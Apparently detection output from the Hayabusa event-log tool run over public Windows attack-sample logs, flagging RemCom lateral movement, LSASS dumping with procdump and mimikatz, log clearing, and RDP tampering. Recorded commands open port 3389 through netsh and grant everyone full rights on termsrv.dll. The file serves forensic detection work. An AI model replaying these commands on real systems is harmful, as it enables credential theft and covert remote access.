Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:02.311 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:02.561 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: 
C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share 
File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP 
Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New 
Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolsv | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 
365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File 
Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-18 05:17:44.537 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | 
PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:44.637 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:44.797 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:45.478 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:45.628 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:45.648 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,rules/sigma/registry_event/win_re_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Registry 
Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 365ABB72-AB81-5C8E-0000-001024960C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,rules/sigma/process_creation/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,rules/sigma/process_creation/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 